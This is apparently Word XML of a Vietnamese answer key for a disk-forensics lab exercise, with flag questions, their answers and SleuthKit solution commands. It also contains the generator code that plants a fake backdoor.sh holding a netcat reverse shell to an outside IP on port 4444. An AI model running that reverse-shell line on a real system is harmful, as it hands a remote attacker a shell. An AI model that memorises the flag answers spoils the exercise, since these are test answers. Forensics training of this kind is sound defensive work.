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49CF9" w14:textId="77777777" w:rsidR="002F0872" w:rsidRDefault="002F0872" w:rsidP="002F0872"/>
    <w:p w14:paraId="61A6EAF9" w14:textId="77777777" w:rsidR="002F0872" w:rsidRDefault="002F0872" w:rsidP="002F0872">
      <w:r>
        <w:t># BÁO CÁO PHÂN TÍCH KỊCH BẢN 2: DISK FORENSICS (ĐIỀU TRA Ổ CỨNG)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B914F96" w14:textId="77777777" w:rsidR="002F0872" w:rsidRDefault="002F0872" w:rsidP="002F0872"/>
    <w:p w14:paraId="70A7145E" w14:textId="77777777" w:rsidR="002F0872" w:rsidRDefault="002F0872" w:rsidP="002F0872">
      <w:r>
        <w:t>Kịch bản 2 tập trung vào kỹ năng phân tích ảnh đĩa (disk image forensic), khôi phục các tệp tin đã bị xóa (file recovery/carving) và phát hiện các dấu vết tấn công/mã độc của tin tặc để lại trên ổ cứng.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54C5430C" w14:textId="77777777" w:rsidR="002F0872" w:rsidRDefault="002F0872" w:rsidP="002F0872"/>
    <w:p w14:paraId="2EAA0897" w14:textId="77777777" w:rsidR="002F0872" w:rsidRDefault="002F0872" w:rsidP="002F0872">
      <w:r>
        <w:t>---</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C184B8B" w14:textId="77777777" w:rsidR="002F0872" w:rsidRDefault="002F0872" w:rsidP="002F0872"/>
    <w:p w14:paraId="5B16E04C" w14:textId="77777777" w:rsidR="002F0872" w:rsidRDefault="002F0872" w:rsidP="002F0872">
      <w:r>
        <w:t>## 1. Thông tin chung về Kịch bản</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17A7A46B" w14:textId="77777777" w:rsidR="002F0872" w:rsidRDefault="002F0872" w:rsidP="002F0872"/>
    <w:p w14:paraId="155B6A6D" w14:textId="77777777" w:rsidR="002F0872" w:rsidRDefault="002F0872" w:rsidP="002F0872">
      <w:r>
        <w:t>*   **Tên kịch bản:** Disk Forensics (Điều tra ổ cứng, khôi phục file đã xóa và phát hiện malware).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F0E8AFF" w14:textId="77777777" w:rsidR="002F0872" w:rsidRDefault="002F0872" w:rsidP="002F0872">
      <w:r>
        <w:t>*   **Mức độ:** Trung bình (Medium).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BF749B5" w14:textId="77777777" w:rsidR="002F0872" w:rsidRDefault="002F0872" w:rsidP="002F0872">
      <w:r>
        <w:t>*   **Thời gian làm bài:** 90 phút.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78D35BF9" w14:textId="77777777" w:rsidR="002F0872" w:rsidRDefault="002F0872" w:rsidP="002F0872">
      <w:r>
        <w:t>*   **Công cụ khuyến nghị:** Autopsy workflow, SleuthKit (`fls`, `icat`, `mmls`), `ewfinfo`, `strings`, `md5sum`.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F7C5AA3" w14:textId="77777777" w:rsidR="002F0872" w:rsidRDefault="002F0872" w:rsidP="002F0872">
      <w:r>
        <w:t>*   **Trạng thái kích hoạt:** `active` (Học viên có thể truy cập trực tiếp từ Dashboard).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40AE10BB" w14:textId="77777777" w:rsidR="002F0872" w:rsidRDefault="002F0872" w:rsidP="002F0872"/>
    <w:p w14:paraId="70C4B6E3" w14:textId="77777777" w:rsidR="002F0872" w:rsidRDefault="002F0872" w:rsidP="002F0872">
      <w:r>
        <w:t>---</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45A92451" w14:textId="77777777" w:rsidR="002F0872" w:rsidRDefault="002F0872" w:rsidP="002F0872"/>
    <w:p w14:paraId="04E30907" w14:textId="77777777" w:rsidR="002F0872" w:rsidRDefault="002F0872" w:rsidP="002F0872">
      <w:r>
        <w:t>## 2. Hồ sơ Chứng cứ số (Evidence Files)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14DDFD9B" w14:textId="77777777" w:rsidR="002F0872" w:rsidRDefault="002F0872" w:rsidP="002F0872"/>
    <w:p w14:paraId="2356CF4B" w14:textId="77777777" w:rsidR="002F0872" w:rsidRDefault="002F0872" w:rsidP="002F0872">
      <w:r>
        <w:t>Thư mục chứa chứng cứ trên server: [static/evidence/scenario_2/](file:///c:/ForensicsLab/static/evidence/scenario_2/)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="545B3B9F" w14:textId="77777777" w:rsidR="002F0872" w:rsidRDefault="002F0872" w:rsidP="002F0872"/>
    <w:p w14:paraId="4B0B38A0" w14:textId="77777777" w:rsidR="002F0872" w:rsidRDefault="002F0872" w:rsidP="002F0872">
      <w:r>
        <w:t>### Danh sách các tệp tin chứng cứ:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08882141" w14:textId="77777777" w:rsidR="002F0872" w:rsidRDefault="002F0872" w:rsidP="002F0872">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>1.  **`suspect_disk.E01`**</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="697066E5" w14:textId="77777777" w:rsidR="002F0872" w:rsidRDefault="002F0872" w:rsidP="002F0872">
      <w:r>
        <w:t xml:space="preserve">    *   **Loại file:** Ảnh đĩa định dạng Expert Witness Format (E01) mô phỏng ổ cứng của nghi phạm.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18284672" w14:textId="77777777" w:rsidR="002F0872" w:rsidRDefault="002F0872" w:rsidP="002F0872">
      <w:r>
        <w:t xml:space="preserve">    *   **Kích thước thực tế:** 1 MB ($1,048,576$ bytes).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C23426D" w14:textId="77777777" w:rsidR="002F0872" w:rsidRDefault="002F0872" w:rsidP="002F0872">
      <w:r>
        <w:t xml:space="preserve">    *   **Mã SHA-256:** `3231bd7dd82241d2864ff94998444587c85c1ebff4f8cb74aee90787b62f2465`.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FB84695" w14:textId="77777777" w:rsidR="002F0872" w:rsidRDefault="002F0872" w:rsidP="002F0872">
      <w:r>
        <w:t xml:space="preserve">    *   **Mã MD5 (Cố định/Tính toán động):** `dab05fdce91ee2ff2de2269c837e77b8`.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B78AD0D" w14:textId="77777777" w:rsidR="002F0872" w:rsidRDefault="002F0872" w:rsidP="002F0872">
      <w:r>
        <w:t>2.  **`chain_of_custody.txt`**</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F93AD48" w14:textId="77777777" w:rsidR="002F0872" w:rsidRDefault="002F0872" w:rsidP="002F0872">
      <w:r>
        <w:t xml:space="preserve">    *   **Loại file:** Tệp tin văn bản (ASCII text).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F6B69D1" w14:textId="77777777" w:rsidR="002F0872" w:rsidRDefault="002F0872" w:rsidP="002F0872">
      <w:r>
        <w:t xml:space="preserve">    *   **Nội dung:** Tài liệu ghi nhận chuỗi hành trình chứng cứ (Chain of Custody) phục vụ cho tính pháp lý:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46C7356A" w14:textId="77777777" w:rsidR="002F0872" w:rsidRDefault="002F0872" w:rsidP="002F0872">
      <w:r>
        <w:t xml:space="preserve">        *   **Mã vụ án:** `FL-2026-001`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63591014" w14:textId="77777777" w:rsidR="002F0872" w:rsidRDefault="002F0872" w:rsidP="002F0872">
      <w:r>
        <w:t xml:space="preserve">        *   **Mã chứng cứ:** `DISK-001`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ACAB0AC" w14:textId="77777777" w:rsidR="002F0872" w:rsidRDefault="002F0872" w:rsidP="002F0872">
      <w:r>
        <w:t xml:space="preserve">        *   **Mô tả:** Ảnh ổ đĩa vật lý thu thập từ máy trạm của nghi phạm.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CE8956A" w14:textId="77777777" w:rsidR="002F0872" w:rsidRDefault="002F0872" w:rsidP="002F0872">
      <w:r>
        <w:t xml:space="preserve">        *   **Người thu thập:** Điều tra viên Nguyễn An.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01B9091C" w14:textId="77777777" w:rsidR="002F0872" w:rsidRDefault="002F0872" w:rsidP="002F0872">
      <w:r>
        <w:t xml:space="preserve">        *   **Thời gian thu thập:** `2026-05-20 09:00:00 UTC`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="329F258E" w14:textId="77777777" w:rsidR="002F0872" w:rsidRDefault="002F0872" w:rsidP="002F0872">
      <w:r>
        <w:t xml:space="preserve">        *   **Phương thức:** FTK Imager (Physical Drive Acquisition).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E707CC7" w14:textId="77777777" w:rsidR="002F0872" w:rsidRDefault="002F0872" w:rsidP="002F0872">
      <w:r>
        <w:t>3.  **`suspect_disk.E01.sha256`** &amp; **`chain_of_custody.txt.sha256`**: Các tệp tin lưu mã hash SHA-256 tương ứng để xác minh tính toàn vẹn (Integrity Check).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C6F8DA5" w14:textId="77777777" w:rsidR="002F0872" w:rsidRDefault="002F0872" w:rsidP="002F0872"/>
    <w:p w14:paraId="3E99EB5A" w14:textId="77777777" w:rsidR="002F0872" w:rsidRDefault="002F0872" w:rsidP="002F0872">
      <w:r>
        <w:t>---</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31E6B190" w14:textId="77777777" w:rsidR="002F0872" w:rsidRDefault="002F0872" w:rsidP="002F0872"/>
    <w:p w14:paraId="7A36C14B" w14:textId="77777777" w:rsidR="002F0872" w:rsidRDefault="002F0872" w:rsidP="002F0872">
      <w:r>
        <w:t>## 3. Các Câu hỏi (Flags) &amp; Lời giải chi tiết</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21A24E3D" w14:textId="77777777" w:rsidR="002F0872" w:rsidRDefault="002F0872" w:rsidP="002F0872"/>
    <w:p w14:paraId="6AA03487" w14:textId="77777777" w:rsidR="002F0872" w:rsidRDefault="002F0872" w:rsidP="002F0872">
      <w:r>
        <w:t>### Câu hỏi 1: Xác định tính toàn vẹn của ảnh đĩa</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F0C0BFE" w14:textId="77777777" w:rsidR="002F0872" w:rsidRDefault="002F0872" w:rsidP="002F0872">
      <w:r>
        <w:t>*   **Nội dung câu hỏi:** *"Mã hash MD5 của tệp ảnh ổ cứng suspect_disk.E01 là gì?"*</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C34C6CC" w14:textId="77777777" w:rsidR="002F0872" w:rsidRDefault="002F0872" w:rsidP="002F0872">
      <w:r>
        <w:t>*   **Điểm số:** 2.0 điểm.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FBB4A6F" w14:textId="77777777" w:rsidR="002F0872" w:rsidRDefault="002F0872" w:rsidP="002F0872">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>*   **Gợi ý hệ thống:** *"Dùng lệnh md5sum trên tệp tin ảnh ổ cứng."*</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F238BB8" w14:textId="77777777" w:rsidR="002F0872" w:rsidRDefault="002F0872" w:rsidP="002F0872">
      <w:r>
        <w:t>*   **Đáp án (Flag):** `dab05fdce91ee2ff2de2269c837e77b8`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21B3F460" w14:textId="77777777" w:rsidR="002F0872" w:rsidRDefault="002F0872" w:rsidP="002F0872">
      <w:r>
        <w:t>*   **Cách giải quyết:**</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FB2DB3F" w14:textId="77777777" w:rsidR="002F0872" w:rsidRDefault="002F0872" w:rsidP="002F0872">
      <w:r>
        <w:t xml:space="preserve">    *   *Chế độ Docker Live:* Học viên gõ lệnh:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B91C797" w14:textId="77777777" w:rsidR="002F0872" w:rsidRDefault="002F0872" w:rsidP="002F0872">
      <w:r>
        <w:t xml:space="preserve">        ```bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02A2E58B" w14:textId="77777777" w:rsidR="002F0872" w:rsidRDefault="002F0872" w:rsidP="002F0872">
      <w:r>
        <w:t xml:space="preserve">        md5sum suspect_disk.E01</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E4CB85F" w14:textId="77777777" w:rsidR="002F0872" w:rsidRDefault="002F0872" w:rsidP="002F0872">
      <w:r>
        <w:t xml:space="preserve">        ```</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2049FB2B" w14:textId="77777777" w:rsidR="002F0872" w:rsidRDefault="002F0872" w:rsidP="002F0872">
      <w:r>
        <w:t xml:space="preserve">    *   *Chế độ Giả lập (Simulated):* Terminal giả lập sẽ kiểm tra cú pháp và in ra mã MD5 tĩnh tương ứng.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51356541" w14:textId="77777777" w:rsidR="002F0872" w:rsidRDefault="002F0872" w:rsidP="002F0872"/>
    <w:p w14:paraId="087A5724" w14:textId="77777777" w:rsidR="002F0872" w:rsidRDefault="002F0872" w:rsidP="002F0872">
      <w:r>
        <w:t>---</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="586DC277" w14:textId="77777777" w:rsidR="002F0872" w:rsidRDefault="002F0872" w:rsidP="002F0872"/>
    <w:p w14:paraId="05CA2687" w14:textId="77777777" w:rsidR="002F0872" w:rsidRDefault="002F0872" w:rsidP="002F0872">
      <w:r>
        <w:t>### Câu hỏi 2: Phát hiện tệp tin nhạy cảm bị xóa</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3734AD9C" w14:textId="77777777" w:rsidR="002F0872" w:rsidRDefault="002F0872" w:rsidP="002F0872">
      <w:r>
        <w:t>*   **Nội dung câu hỏi:** *"Tên tệp tin bị xóa chứa thông tin nhạy cảm của hacker là gì?"*</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AF505B9" w14:textId="77777777" w:rsidR="002F0872" w:rsidRDefault="002F0872" w:rsidP="002F0872">
      <w:r>
        <w:t>*   **Điểm số:** 2.0 điểm.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24E9720F" w14:textId="77777777" w:rsidR="002F0872" w:rsidRDefault="002F0872" w:rsidP="002F0872">
      <w:r>
        <w:t>*   **Gợi ý hệ thống:** *"Dùng strings hoặc fls để tìm dấu vết tệp đã bị xóa trong ảnh đĩa."*</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AC97A00" w14:textId="77777777" w:rsidR="002F0872" w:rsidRDefault="002F0872" w:rsidP="002F0872">
      <w:r>
        <w:t>*   **Đáp án (Flag):** `secret_flag.txt`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E5A0F98" w14:textId="77777777" w:rsidR="002F0872" w:rsidRDefault="002F0872" w:rsidP="002F0872">
      <w:r>
        <w:t>*   **Cách giải quyết:**</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3014F989" w14:textId="77777777" w:rsidR="002F0872" w:rsidRDefault="002F0872" w:rsidP="002F0872">
      <w:r>
        <w:t xml:space="preserve">    *   *Chế độ Docker Live:* Học viên sử dụng công cụ `fls` trong bộ **SleuthKit** để liệt kê danh sách các entry của thư mục đĩa đính kèm trong ảnh đĩa. Các entry đã bị xóa sẽ được ký hiệu bằng dấu `*`.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FB5C2E7" w14:textId="77777777" w:rsidR="002F0872" w:rsidRDefault="002F0872" w:rsidP="002F0872">
      <w:r>
        <w:t xml:space="preserve">        ```bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B02F25B" w14:textId="77777777" w:rsidR="002F0872" w:rsidRDefault="002F0872" w:rsidP="002F0872">
      <w:r>
        <w:t xml:space="preserve">        fls suspect_disk.E01</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B18701D" w14:textId="77777777" w:rsidR="002F0872" w:rsidRDefault="002F0872" w:rsidP="002F0872">
      <w:r>
        <w:t xml:space="preserve">        ```</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2391E779" w14:textId="77777777" w:rsidR="002F0872" w:rsidRDefault="002F0872" w:rsidP="002F0872">
      <w:r>
        <w:t xml:space="preserve">        Kết quả hiển thị từ hệ thống sẽ dạng:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F69C5D4" w14:textId="77777777" w:rsidR="002F0872" w:rsidRDefault="002F0872" w:rsidP="002F0872">
      <w:r>
        <w:t xml:space="preserve">        ```text</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07D72AB0" w14:textId="77777777" w:rsidR="002F0872" w:rsidRDefault="002F0872" w:rsidP="002F0872">
      <w:r>
        <w:t xml:space="preserve">        d/d 1420:  lost+found</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="648D5F27" w14:textId="77777777" w:rsidR="002F0872" w:rsidRDefault="002F0872" w:rsidP="002F0872">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">        r/r 2045:  hosts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E88445F" w14:textId="77777777" w:rsidR="002F0872" w:rsidRDefault="002F0872" w:rsidP="002F0872">
      <w:r>
        <w:t xml:space="preserve">        r/r 2046:  resolv.conf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CB3A4E2" w14:textId="77777777" w:rsidR="002F0872" w:rsidRDefault="002F0872" w:rsidP="002F0872">
      <w:r>
        <w:t xml:space="preserve">        r/r * 3089:  secret_flag.txt (DELETED)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42C97108" w14:textId="77777777" w:rsidR="002F0872" w:rsidRDefault="002F0872" w:rsidP="002F0872">
      <w:r>
        <w:t xml:space="preserve">        r/r 4012:  backdoor.sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45020E5B" w14:textId="77777777" w:rsidR="002F0872" w:rsidRDefault="002F0872" w:rsidP="002F0872">
      <w:r>
        <w:t xml:space="preserve">        ```</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AED99B6" w14:textId="77777777" w:rsidR="002F0872" w:rsidRDefault="002F0872" w:rsidP="002F0872">
      <w:r>
        <w:t xml:space="preserve">        =&gt; Tệp bị xóa (có dấu `*` và mã inode `3089`) chính là `secret_flag.txt`.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="082EE776" w14:textId="77777777" w:rsidR="002F0872" w:rsidRDefault="002F0872" w:rsidP="002F0872">
      <w:r>
        <w:t xml:space="preserve">    *   *Chế độ Giả lập (Simulated):* Gõ `fls suspect_disk.E01` sẽ giả lập lại đúng đầu ra ở trên.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A725597" w14:textId="77777777" w:rsidR="002F0872" w:rsidRDefault="002F0872" w:rsidP="002F0872"/>
    <w:p w14:paraId="5F4A2C6A" w14:textId="77777777" w:rsidR="002F0872" w:rsidRDefault="002F0872" w:rsidP="002F0872">
      <w:r>
        <w:t>---</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B96BEF1" w14:textId="77777777" w:rsidR="002F0872" w:rsidRDefault="002F0872" w:rsidP="002F0872"/>
    <w:p w14:paraId="2127F4A0" w14:textId="77777777" w:rsidR="002F0872" w:rsidRDefault="002F0872" w:rsidP="002F0872">
      <w:r>
        <w:t>### Câu hỏi 3: Khôi phục dữ liệu tệp tin bị xóa</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14E06622" w14:textId="77777777" w:rsidR="002F0872" w:rsidRDefault="002F0872" w:rsidP="002F0872">
      <w:r>
        <w:t>*   **Nội dung câu hỏi:** *"Giá trị flag bí mật được lưu trữ trong tệp bị xóa đó là gì?"*</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FBAEF2E" w14:textId="77777777" w:rsidR="002F0872" w:rsidRDefault="002F0872" w:rsidP="002F0872">
      <w:r>
        <w:t>*   **Điểm số:** 2.0 điểm.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4176A6D4" w14:textId="77777777" w:rsidR="002F0872" w:rsidRDefault="002F0872" w:rsidP="002F0872">
      <w:r>
        <w:t>*   **Gợi ý hệ thống:** *"Dùng strings hoặc icat để đọc nội dung tệp bị xóa theo dấu vết tìm được."*</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FEAFB3D" w14:textId="77777777" w:rsidR="002F0872" w:rsidRDefault="002F0872" w:rsidP="002F0872">
      <w:r>
        <w:t>*   **Đáp án (Flag):** `FLAG{d1sk_f0r3ns1cs_is_fun}`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74B54666" w14:textId="77777777" w:rsidR="002F0872" w:rsidRDefault="002F0872" w:rsidP="002F0872">
      <w:r>
        <w:t>*   **Cách giải quyết:**</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="695A9EFA" w14:textId="77777777" w:rsidR="002F0872" w:rsidRDefault="002F0872" w:rsidP="002F0872">
      <w:r>
        <w:t xml:space="preserve">    *   *Chế độ Docker Live:* Học viên sử dụng công cụ `icat` từ bộ SleuthKit kết hợp với mã inode `3089` đã tìm được từ bước trước để truy xuất trực tiếp dữ liệu từ các blocks chứa file bị xóa mà chưa bị ghi đè:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5491DAA0" w14:textId="77777777" w:rsidR="002F0872" w:rsidRDefault="002F0872" w:rsidP="002F0872">
      <w:r>
        <w:t xml:space="preserve">        ```bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A7D04FD" w14:textId="77777777" w:rsidR="002F0872" w:rsidRDefault="002F0872" w:rsidP="002F0872">
      <w:r>
        <w:t xml:space="preserve">        icat suspect_disk.E01 3089</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29354816" w14:textId="77777777" w:rsidR="002F0872" w:rsidRDefault="002F0872" w:rsidP="002F0872">
      <w:r>
        <w:t xml:space="preserve">        ```</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C1B364D" w14:textId="77777777" w:rsidR="002F0872" w:rsidRDefault="002F0872" w:rsidP="002F0872">
      <w:r>
        <w:t xml:space="preserve">        Hoặc trích xuất chuỗi thô từ ảnh đĩa:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AFF1EA9" w14:textId="77777777" w:rsidR="002F0872" w:rsidRDefault="002F0872" w:rsidP="002F0872">
      <w:r>
        <w:t xml:space="preserve">        ```bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68480871" w14:textId="77777777" w:rsidR="002F0872" w:rsidRDefault="002F0872" w:rsidP="002F0872">
      <w:r>
        <w:t xml:space="preserve">        strings suspect_disk.E01 | grep FLAG</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E78C918" w14:textId="77777777" w:rsidR="002F0872" w:rsidRDefault="002F0872" w:rsidP="002F0872">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">        ```</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AC762BA" w14:textId="77777777" w:rsidR="002F0872" w:rsidRDefault="002F0872" w:rsidP="002F0872">
      <w:r>
        <w:t xml:space="preserve">        Kết quả hiển thị nội dung chứa trong tệp: `FLAG{d1sk_f0r3ns1cs_is_fun}`.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E235E92" w14:textId="77777777" w:rsidR="002F0872" w:rsidRDefault="002F0872" w:rsidP="002F0872">
      <w:r>
        <w:t xml:space="preserve">    *   *Chế độ Giả lập (Simulated):* Gõ `icat suspect_disk.E01 3089` hoặc `icat suspect_disk.E01 secret_flag.txt` sẽ trả về cờ tương tự.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DF0018C" w14:textId="77777777" w:rsidR="002F0872" w:rsidRDefault="002F0872" w:rsidP="002F0872"/>
    <w:p w14:paraId="6B783119" w14:textId="77777777" w:rsidR="002F0872" w:rsidRDefault="002F0872" w:rsidP="002F0872">
      <w:r>
        <w:t>---</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D0072BB" w14:textId="77777777" w:rsidR="002F0872" w:rsidRDefault="002F0872" w:rsidP="002F0872"/>
    <w:p w14:paraId="153E6A72" w14:textId="77777777" w:rsidR="002F0872" w:rsidRDefault="002F0872" w:rsidP="002F0872">
      <w:r>
        <w:t>## 4. Cơ chế hoạt động kỹ thuật bên dưới (Technical Insights)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16864A4B" w14:textId="77777777" w:rsidR="002F0872" w:rsidRDefault="002F0872" w:rsidP="002F0872"/>
    <w:p w14:paraId="38DCDF89" w14:textId="77777777" w:rsidR="002F0872" w:rsidRDefault="002F0872" w:rsidP="002F0872">
      <w:r>
        <w:t>### A. Cơ chế tạo cấu trúc đĩa mô phỏng</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C785EC5" w14:textId="77777777" w:rsidR="002F0872" w:rsidRDefault="002F0872" w:rsidP="002F0872">
      <w:r>
        <w:t>Tệp đĩa `suspect_disk.E01` thực chất được tạo ra thông qua hàm `gen_scenario2()` trong tệp tin [generate_evidence.py](file:///c:/ForensicsLab/generate_evidence.py) bằng cách ghi trực tiếp các mảng byte có cấu trúc đặc biệt:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00D8506F" w14:textId="77777777" w:rsidR="002F0872" w:rsidRDefault="002F0872" w:rsidP="002F0872">
      <w:r>
        <w:t>*   **Kích thước đĩa:** Tạo tệp trống dung lượng $1\text{ MB}$.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="059273E4" w14:textId="77777777" w:rsidR="002F0872" w:rsidRDefault="002F0872" w:rsidP="002F0872">
      <w:r>
        <w:t>*   **MBR Signature:** Byte thứ $510$ và $511$ được đặt là `0x55 0xAA` (Dấu hiệu hợp lệ của Master Boot Record).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E74A2D5" w14:textId="77777777" w:rsidR="002F0872" w:rsidRDefault="002F0872" w:rsidP="002F0872">
      <w:r>
        <w:t>*   **Chuỗi cấu trúc hệ thống tệp đĩa giả:**</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B97A2C6" w14:textId="77777777" w:rsidR="002F0872" w:rsidRDefault="002F0872" w:rsidP="002F0872">
      <w:r>
        <w:t xml:space="preserve">    *   *Tại offset `0x1000`:* Ghi các chuỗi mô phỏng filesystem: `"ext4"`, `"/home/hacker"`, `"/etc/crontab"`, `"svchost_malicious"`.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="434C54E7" w14:textId="77777777" w:rsidR="002F0872" w:rsidRDefault="002F0872" w:rsidP="002F0872">
      <w:r>
        <w:t xml:space="preserve">    *   *Tại offset `0x10000` (64 KB):* Ghi nhãn tệp bị xóa và nội dung Flag:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62620CFD" w14:textId="77777777" w:rsidR="002F0872" w:rsidRDefault="002F0872" w:rsidP="002F0872">
      <w:r>
        <w:t xml:space="preserve">        ```python</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66993567" w14:textId="77777777" w:rsidR="002F0872" w:rsidRDefault="002F0872" w:rsidP="002F0872">
      <w:r>
        <w:t xml:space="preserve">        flag_content = b"secret_flag.txt\x00FLAG{d1sk_f0r3ns1cs_is_fun}\x00"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EA2950D" w14:textId="77777777" w:rsidR="002F0872" w:rsidRDefault="002F0872" w:rsidP="002F0872">
      <w:r>
        <w:t xml:space="preserve">        ```</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E3CC506" w14:textId="77777777" w:rsidR="002F0872" w:rsidRDefault="002F0872" w:rsidP="002F0872">
      <w:r>
        <w:t xml:space="preserve">    *   *Tại offset `0x20000` (128 KB):* Ghi nhãn backdoor và mã lệnh độc hại:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C5F64F3" w14:textId="77777777" w:rsidR="002F0872" w:rsidRDefault="002F0872" w:rsidP="002F0872">
      <w:r>
        <w:t xml:space="preserve">        ```python</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52B09C16" w14:textId="77777777" w:rsidR="002F0872" w:rsidRDefault="002F0872" w:rsidP="002F0872">
      <w:r>
        <w:t xml:space="preserve">        backdoor = b"backdoor.sh\x00#!/bin/bash\n# Backdoor persistence\nnc -e /bin/bash 185.220.101.5 4444\n"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C60E1B7" w14:textId="77777777" w:rsidR="002F0872" w:rsidRDefault="002F0872" w:rsidP="002F0872">
      <w:r>
        <w:t xml:space="preserve">        ```</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BC00EA3" w14:textId="77777777" w:rsidR="002F0872" w:rsidRDefault="002F0872" w:rsidP="002F0872"/>
    <w:p w14:paraId="61FE3EEE" w14:textId="77777777" w:rsidR="002F0872" w:rsidRDefault="002F0872" w:rsidP="002F0872">
      <w:r>
        <w:t>### B. Cơ chế Chạy lệnh Sandbox (Docker vs Simulated) và Tính điểm</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71C127BE" w14:textId="77777777" w:rsidR="002F0872" w:rsidRDefault="002F0872" w:rsidP="002F0872">
      <w:r>
        <w:t>1.  **Chế độ Docker Live:**</w:t>
      </w:r>
    </w:p>
